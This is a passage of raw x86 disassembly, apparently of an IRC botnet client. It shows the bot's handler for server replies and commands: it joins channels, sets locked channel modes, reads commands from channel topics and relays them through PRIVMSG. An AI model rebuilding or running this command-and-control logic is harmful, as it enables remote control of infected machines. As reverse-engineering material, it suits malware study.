push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
loc_40DCB8: ; CODE XREF: sub_40D871+2FA�j
push offset dword_41DA70
lea eax, [ebp+var_2C8]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_2C8]
push eax
call sub_40D7E5
pop ecx
loc_40DCE5: ; CODE XREF: sub_40D871+445�j
lea eax, [ebp+var_2C8]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DCFD: ; CODE XREF: sub_40D871+2D0�j
push offset aError ; "ERROR"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD25
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD25: ; CODE XREF: sub_40D871+49F�j
push offset aJoin ; "JOIN"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
push offset byte_41EE18
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DD97
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40DD97
mov eax, [ebp+arg_C]
mov eax, [eax+8]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz short loc_40DD74
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
mov [ebp+var_7E8], eax
jmp short loc_40DD80
; ---------------------------------------------------------------------------
loc_40DD74: ; CODE XREF: sub_40D871+4F2�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_7E8], eax
loc_40DD80: ; CODE XREF: sub_40D871+501�j
push [ebp+var_7E8]
push offset aModeSSmntu ; "MODE %s +smntu"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DD97: ; CODE XREF: sub_40D871+4C8�j
; sub_40D871+4DB�j ...
push offset a001 ; "001"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DE70
push 21h
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
lea eax, [ebp+var_4B4]
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
lea eax, [ebp+var_4B4]
push eax
push offset byte_41EE18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_4B4]
push eax
push offset aModeSXi ; "MODE %s +xi"
call sub_40D6CB
pop ecx
pop ecx
push offset dword_41ED18
push offset dword_41DA80
push offset dword_419AD0
call sub_40D6CB
add esp, 0Ch
lea eax, [ebp+var_490]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
test eax, eax
jz short loc_40DE58
lea eax, [ebp+var_490]
push eax
call sub_4041B7
pop ecx
test eax, eax
jz short loc_40DE43
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_40DE56
; ---------------------------------------------------------------------------
loc_40DE43: ; CODE XREF: sub_40D871+5BB�j
lea eax, [ebp+var_490]
push eax
push offset dword_41EF18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DE56: ; CODE XREF: sub_40D871+5D0�j
jmp short loc_40DE6B
; ---------------------------------------------------------------------------
loc_40DE58: ; CODE XREF: sub_40D871+5AA�j
lea eax, [ebp+var_4B4]
push eax
push offset aUserhostS ; "USERHOST %s"
call sub_40D6CB
pop ecx
pop ecx
loc_40DE6B: ; CODE XREF: sub_40D871:loc_40DE56�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE70: ; CODE XREF: sub_40D871+53A�j
push offset a451 ; "451"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DE96
push 0
push 1
call sub_40D043
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DE96: ; CODE XREF: sub_40D871+613�j
push offset a302 ; "302"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DF3E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jnz short loc_40DEBE
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEBE: ; CODE XREF: sub_40D871+646�j
push offset a@ ; "@"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_5B8], eax
cmp [ebp+var_5B8], 0
jnz short loc_40DEE4
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DEE4: ; CODE XREF: sub_40D871+66C�j
push 100h
mov eax, [ebp+var_5B8]
inc eax
push eax
push offset dword_41EF18
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_5B4]
push eax
mov eax, [ebp+var_5B8]
inc eax
push eax
call sub_404612
pop ecx
pop ecx
movzx eax, al
test eax, eax
jnz short loc_40DF20
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF20: ; CODE XREF: sub_40D871+6A8�j
push 100h
lea eax, [ebp+var_5B4]
push eax
push offset dword_41EF18
call sub_407A56
add esp, 0Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF3E: ; CODE XREF: sub_40D871+639�j
push offset aNick ; "NICK"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF8E
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jnz short loc_40DF62
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF62: ; CODE XREF: sub_40D871+6EA�j
push offset byte_41EE18
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40DF89
mov eax, [ebp+arg_C]
mov eax, [eax+8]
inc eax
push eax
push offset byte_41EE18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DF89: ; CODE XREF: sub_40D871+702�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DF8E: ; CODE XREF: sub_40D871+6E1�j
push offset a332 ; "332"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz loc_40E128
mov eax, [ebp+arg_10]
cmp dword ptr [eax+10h], 0
jz short loc_40DFBF
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jnz short loc_40DFC4
loc_40DFBF: ; CODE XREF: sub_40D871+73E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DFC4: ; CODE XREF: sub_40D871+74C�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E05F
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_5BC], eax
push [ebp+var_5BC]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+arg_10]
cmp dword ptr [eax+14h], 0
jz short loc_40E04E
mov eax, [ebp+arg_10]
push dword ptr [eax+14h]
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
lea eax, [eax+ecx+1]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40E05F
; ---------------------------------------------------------------------------
loc_40E04E: ; CODE XREF: sub_40D871+7BB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
mov ecx, [ebp+var_5BC]
and byte ptr [eax+ecx+1], 0
loc_40E05F: ; CODE XREF: sub_40D871+760�j
; sub_40D871+7DB�j
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
movsx eax, byte ptr [eax+1]
test eax, eax
jz loc_40E123
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
mov eax, [ebp+arg_10]
mov eax, [eax+10h]
inc eax
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C0], eax
and [ebp+var_7C8], 0
loc_40E09A: ; CODE XREF: sub_40D871+8AD�j
cmp [ebp+var_7C0], 0
jnz short loc_40E0A5
jmp short loc_40E123
; ---------------------------------------------------------------------------
loc_40E0A5: ; CODE XREF: sub_40D871+830�j
; sub_40D871+851�j
mov eax, [ebp+var_7C0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40E0B5
jmp short loc_40E0C4
; ---------------------------------------------------------------------------
loc_40E0B5: ; CODE XREF: sub_40D871+840�j
mov eax, [ebp+var_7C0]
inc eax
mov [ebp+var_7C0], eax
jmp short loc_40E0A5
; ---------------------------------------------------------------------------
loc_40E0C4: ; CODE XREF: sub_40D871+842�j
push [ebp+var_7C0]
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_7BC]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_7BC]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_7C4]
push eax
push offset asc_41A07C ; "]["
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_7C8], eax
mov eax, [ebp+var_7C8]
mov [ebp+var_7C0], eax
jmp loc_40E09A
; ---------------------------------------------------------------------------
loc_40E123: ; CODE XREF: sub_40D871+7FA�j
; sub_40D871+832�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E128: ; CODE XREF: sub_40D871+731�j
cmp [ebp+arg_0], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+8], 0
jz short loc_40E153
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz short loc_40E153
push offset byte_41EE18
push [ebp+arg_4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E158
loc_40E153: ; CODE XREF: sub_40D871+8BB�j
; sub_40D871+8C4�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E158: ; CODE XREF: sub_40D871+8E0�j
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E1C0
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1AB
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E1BE
; ---------------------------------------------------------------------------
loc_40E1AB: ; CODE XREF: sub_40D871+923�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
and [ebp+var_84], 0
loc_40E1BE: ; CODE XREF: sub_40D871+938�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40D871+915�j
push offset aNotice ; "NOTICE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E211
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax]
cmp eax, 1
jnz short loc_40E1F9
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
mov [ebp+var_84], 3
jmp short loc_40E20F
; ---------------------------------------------------------------------------
loc_40E1F9: ; CODE XREF: sub_40D871+971�j
mov eax, [ebp+arg_C]
mov eax, [eax+8]
mov [ebp+var_90], eax
mov [ebp+var_84], 1
loc_40E20F: ; CODE XREF: sub_40D871+986�j
jmp short loc_40E216
; ---------------------------------------------------------------------------
loc_40E211: ; CODE XREF: sub_40D871+963�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E216: ; CODE XREF: sub_40D871:loc_40E1BE�j
; sub_40D871:loc_40E20F�j
cmp [ebp+var_84], 3
jnz loc_40E321
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_C]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
mov ecx, [ebp+arg_10]
mov [ecx+0Ch], eax
and [ebp+var_7CC], 0
jmp short loc_40E253
; ---------------------------------------------------------------------------
loc_40E246: ; CODE XREF: sub_40D871:loc_40E31C�j
mov eax, [ebp+var_7CC]
inc eax
mov [ebp+var_7CC], eax
loc_40E253: ; CODE XREF: sub_40D871+9D3�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+eax*4], 0
jz short loc_40E26B
cmp [ebp+var_7CC], 0Fh
jnz short loc_40E2B8
loc_40E26B: ; CODE XREF: sub_40D871+9EF�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D4], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E2B6
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D4]
mov byte ptr [eax+ecx-1], 1
loc_40E2B6: ; CODE XREF: sub_40D871+A2C�j
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E2B8: ; CODE XREF: sub_40D871+9F8�j
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_7D0], eax
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
movsx eax, byte ptr [eax+ecx-1]
cmp eax, 1
jnz short loc_40E31C
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
mov eax, [ebp+var_7CC]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
mov ecx, [ebp+var_7D0]
and byte ptr [eax+ecx-1], 0
jmp short loc_40E321
; ---------------------------------------------------------------------------
loc_40E31C: ; CODE XREF: sub_40D871+A79�j
jmp loc_40E246
; ---------------------------------------------------------------------------
loc_40E321: ; CODE XREF: sub_40D871+9AC�j
; sub_40D871:loc_40E2B6�j ...
push offset byte_41EE18
push [ebp+var_90]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E340
mov eax, [ebp+arg_4]
mov [ebp+var_90], eax
loc_40E340: ; CODE XREF: sub_40D871+AC4�j
push 7Ah
push 0
lea eax, [ebp+var_7C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_10]
mov eax, [eax]
mov [ebp+var_88], eax
and [ebp+var_8C], 0
mov eax, [ebp+arg_10]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_80], eax
loc_40E370: ; CODE XREF: sub_40D871:loc_40E3F2�j
cmp [ebp+var_80], 3
jnb short loc_40E378
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E378: ; CODE XREF: sub_40D871+B03�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 20h
jnz short loc_40E393
mov eax, [ebp+var_80]
dec eax
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E393: ; CODE XREF: sub_40D871+B17�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-3]
cmp eax, 20h
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-2]
cmp eax, 2Dh
jnz short loc_40E3F0
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
cmp eax, 7Ah
jg short loc_40E3F0
mov [ebp+var_8C], 1
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
movsx eax, byte ptr [eax-1]
loc_40E3E0: ; DATA XREF: .data:off_419BA4�o
mov [ebp+eax+var_7C], 1
mov eax, [ebp+var_80]
sub eax, 3
mov [ebp+var_80], eax
jmp short loc_40E3F2
; ---------------------------------------------------------------------------
loc_40E3F0: ; CODE XREF: sub_40D871+B32�j
; sub_40D871+B44�j ...
jmp short loc_40E3F7
; ---------------------------------------------------------------------------
loc_40E3F2: ; CODE XREF: sub_40D871+B20�j
; sub_40D871+B7D�j
jmp loc_40E370
; ---------------------------------------------------------------------------
loc_40E3F7: ; CODE XREF: sub_40D871+B05�j
; sub_40D871:loc_40E3F0�j
cmp [ebp+var_8C], 0
jz loc_40E4CC
and [ebp+var_7D8], 0
jmp short loc_40E41A
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_40D871:loc_40E4C7�j
mov eax, [ebp+var_7D8]
inc eax
mov [ebp+var_7D8], eax
loc_40E41A: ; CODE XREF: sub_40D871+B9A�j
cmp [ebp+var_7D8], 10h
jnb loc_40E4CC
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
cmp dword ptr [ecx+eax*4], 0
jnz short loc_40E43B
jmp loc_40E4CC
; ---------------------------------------------------------------------------
loc_40E43B: ; CODE XREF: sub_40D871+BC3�j
mov eax, [ebp+var_88]
add eax, [ebp+var_80]
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
cmp [edx+ecx*4], eax
jb short loc_40E4C7
cmp [ebp+var_8C], 0
jz short loc_40E48F
cmp [ebp+var_7D8], 0
jz short loc_40E488
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
push dword ptr [ecx+eax*4-4]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+var_7D8]
mov edx, [ebp+arg_10]
mov ecx, [edx+ecx*4-4]
and byte ptr [ecx+eax], 0
loc_40E488: ; CODE XREF: sub_40D871+BF1�j
and [ebp+var_8C], 0
loc_40E48F: ; CODE XREF: sub_40D871+BE8�j
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
mov eax, [ecx+eax*4]
and byte ptr [eax], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_10]
and dword ptr [ecx+eax*4], 0
mov eax, [ebp+var_7D8]
mov ecx, [ebp+arg_C]
and dword ptr [ecx+eax*4], 0
loc_40E4C7: ; CODE XREF: sub_40D871+BDF�j
jmp loc_40E40D
; ---------------------------------------------------------------------------
loc_40E4CC: ; CODE XREF: sub_40D871+B8D�j
; sub_40D871+BB0�j ...
push offset byte_41EE18
mov eax, [ebp+arg_C]
push dword ptr [eax+8]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E513
mov eax, [ebp+arg_10]
add eax, 0Ch
push eax
mov eax, [ebp+arg_C]
add eax, 0Ch
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E513: ; CODE XREF: sub_40D871+C6F�j
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jnz short loc_40E521
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40E521: ; CODE XREF: sub_40D871+CA9�j
and [ebp+var_7DC], 0
push offset asc_41A070 ; "*"
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E54A
mov [ebp+var_7DC], 1
jmp loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E54A: ; CODE XREF: sub_40D871+CCB�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
push offset byte_41EE18
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E56C
mov [ebp+var_7DC], 1
jmp short loc_40E5DE
; ---------------------------------------------------------------------------
loc_40E56C: ; CODE XREF: sub_40D871+CF0�j
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
cmp eax, 4
ja short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
movsx eax, byte ptr [ecx+eax-1]
cmp eax, 25h
jnz short loc_40E5DE
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+0Ch]
and byte ptr [ecx+eax-1], 0
call sub_410422
xor edx, edx
push 64h
pop ecx
div ecx
inc edx
mov [ebp+var_7E0], edx
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416B9C ; atoi
pop ecx
cmp eax, [ebp+var_7E0]
jl short loc_40E5DE
mov [ebp+var_7DC], 1
loc_40E5DE: ; CODE XREF: sub_40D871+CD4�j
; sub_40D871+CF9�j ...
movzx eax, [ebp+var_7DC]
test eax, eax
jz short loc_40E615
mov eax, [ebp+arg_10]
add eax, 10h
push eax
mov eax, [ebp+arg_C]
add eax, 10h
push eax
lea eax, [ebp+var_7C]
push eax
push [ebp+var_84]
push [ebp+var_90]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40A9CF
add esp, 1Ch
loc_40E615: ; CODE XREF: sub_40D871+31�j
; sub_40D871+4C�j ...
pop edi
leave
retn
sub_40D871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E618 proc near ; CODE XREF: sub_40C93C+A8�p
; sub_40D871+87F�p ...
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_1180 = dword ptr -1180h
var_114C = dword ptr -114Ch
var_1148 = dword ptr -1148h
var_1144 = dword ptr -1144h
var_113C = dword ptr -113Ch
var_1138 = dword ptr -1138h
var_1109 = byte ptr -1109h
var_1108 = byte ptr -1108h
var_1089 = byte ptr -1089h
var_1088 = byte ptr -1088h
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1194h
call sub_416BC0
and [ebp+var_4], 0
push 10h
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1088]
push eax
push [ebp+arg_0]
call sub_407928
add esp, 14h
push offset a302 ; "302"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40E66D
mov dword_41E97C, 1
jmp short loc_40E674
; ---------------------------------------------------------------------------
loc_40E66D: ; CODE XREF: sub_40E618+47�j
and dword_41E97C, 0
loc_40E674: ; CODE XREF: sub_40E618+53�j
cmp [ebp+var_1148], 0
jz short loc_40E686
cmp [ebp+var_1144], 0
jnz short loc_40E68B
loc_40E686: ; CODE XREF: sub_40E618+63�j
jmp locret_40E941
; ---------------------------------------------------------------------------
loc_40E68B: ; CODE XREF: sub_40E618+6C�j
push offset aPrivmsg ; "PRIVMSG"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40E6BB
push offset aNotice ; "NOTICE"
push [ebp+var_1144]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40E7A5
loc_40E6BB: ; CODE XREF: sub_40E618+87�j
cmp [ebp+var_113C], 0
jz loc_40E7A5
cmp [ebp+var_1138], 0
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax]
cmp eax, 3Ah
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+1]
cmp eax, 3Dh
jnz loc_40E7A5
mov eax, [ebp+var_113C]
movsx eax, byte ptr [eax+2]
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40E7A5
mov eax, [ebp+var_113C]
inc eax
push eax
mov eax, [ebp+var_113C]
inc eax
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_1190], eax
push [ebp+var_1190]
mov eax, [ebp+var_113C]
inc eax
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_113C]
add eax, [ebp+var_1190]
and byte ptr [eax+1], 0
push 0Dh
lea eax, [ebp+var_1180]
push eax
lea eax, [ebp+var_113C]
push eax
push [ebp+var_1180]
push [ebp+var_113C]
call sub_407928
add esp, 14h
loc_40E7A5: ; CODE XREF: sub_40E618+9D�j
; sub_40E618+AA�j ...
push offset aLinkLink@link ; "link!link@link"
push [ebp+var_1148]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz loc_40E853
and [ebp+var_1194], 0
jmp short loc_40E7D5
; ---------------------------------------------------------------------------
loc_40E7C8: ; CODE XREF: sub_40E618+234�j
mov eax, [ebp+var_1194]
inc eax
mov [ebp+var_1194], eax
loc_40E7D5: ; CODE XREF: sub_40E618+1AE�j
mov eax, [ebp+var_1194]
cmp off_41DA38[eax*4], 0
jnz short loc_40E7E7
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E618+1CB�j
mov eax, [ebp+var_1194]
push off_41DA38[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_1194]
push off_41DA38[eax*4]
mov eax, [ebp+var_1148]
inc eax
push eax
call sub_40A5BE
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_40E839
mov eax, [ebp+var_1194]
push off_41DA38[eax*4]
call sub_4105AD
pop ecx
mov [ebp+var_4], 1
jmp short loc_40E851
; ---------------------------------------------------------------------------
loc_40E839: ; CODE XREF: sub_40E618+203�j
mov eax, [ebp+var_1194]
push off_41DA38[eax*4]
call sub_4105AD
pop ecx
jmp loc_40E7C8
; ---------------------------------------------------------------------------
loc_40E851: ; CODE XREF: sub_40E618+1CD�j
; sub_40E618+21F�j
jmp short loc_40E85A
; ---------------------------------------------------------------------------
loc_40E853: ; CODE XREF: sub_40E618+1A1�j
mov [ebp+var_4], 1
loc_40E85A: ; CODE XREF: sub_40E618:loc_40E851�j
and [ebp+var_88], 0
mov [ebp+var_114C], 1
jmp short loc_40E87A
; ---------------------------------------------------------------------------
loc_40E86D: ; CODE XREF: sub_40E618:loc_40E90A�j
mov eax, [ebp+var_114C]
inc eax
mov [ebp+var_114C], eax
loc_40E87A: ; CODE XREF: sub_40E618+253�j
cmp [ebp+var_114C], 80h
jge loc_40E90F
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
cmp eax, 21h
jnz short loc_40E8B6
mov [ebp+var_88], 1
mov eax, [ebp+var_114C]
and byte ptr [ebp+eax+var_88+3], 0
loc_40E8B6: ; CODE XREF: sub_40E618+284�j
cmp [ebp+var_88], 0
jnz short loc_40E8DA
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov byte ptr [ebp+ecx+var_88+3], al
loc_40E8DA: ; CODE XREF: sub_40E618+2A5�j
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
mov ecx, [ebp+var_114C]
mov al, [eax]
mov [ebp+ecx+var_1109], al
mov eax, [ebp+var_1148]
add eax, [ebp+var_114C]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_40E90A
jmp short loc_40E90F
; ---------------------------------------------------------------------------
loc_40E90A: ; CODE XREF: sub_40E618+2EE�j
jmp loc_40E86D
; ---------------------------------------------------------------------------
loc_40E90F: ; CODE XREF: sub_40E618+26C�j
; sub_40E618+2F0�j
and [ebp+var_5], 0
and [ebp+var_1089], 0
lea eax, [ebp+var_118C]
push eax
lea eax, [ebp+var_1148]
push eax
lea eax, [ebp+var_1108]
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+var_4]
call sub_40D871
add esp, 14h
